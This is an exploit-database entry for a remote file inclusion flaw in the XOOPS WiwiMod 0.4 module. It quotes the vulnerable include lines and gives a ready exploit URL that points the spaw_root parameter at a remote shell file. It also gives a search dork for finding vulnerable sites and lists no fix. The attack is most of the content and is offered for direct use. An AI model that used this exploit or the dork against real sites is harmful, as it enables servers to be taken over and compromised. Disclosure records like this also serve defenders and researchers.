XOOPS Module WiwiMod 0.4 Remote File Inclusion Vulnerability

2007-06-20 00:00:00

# XOOPS Module WiwiMod v0.4 (spaw_root) RFI Vulnerability

# D.Script:

http://codigolivre.org.br/frs/download.php/1745/xoops2-mod_wiwimod_0.4_xavier_jimenez.zip

# V.Code :
include $spaw_root.'config/spaw_control.config.php';
include $spaw_root.'class/toolbars.class.php';
include $spaw_root.'class/lang.class.php';

# In :
/spaw/spaw_control.class.php

# Exploits:
/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=Shell.txt?

#D0Rk:
allinurl:/modules/wiwimod/


# Discovered by:
GoLd_M = [Mahmood_ali]

# Homepage:
http://www.Tryag.Com/cc

# Sp.Thanx To :
Tryag-Team & Asb-May's Team

#

Fixes

No fixes

In order to submit a new fix you need to be registered.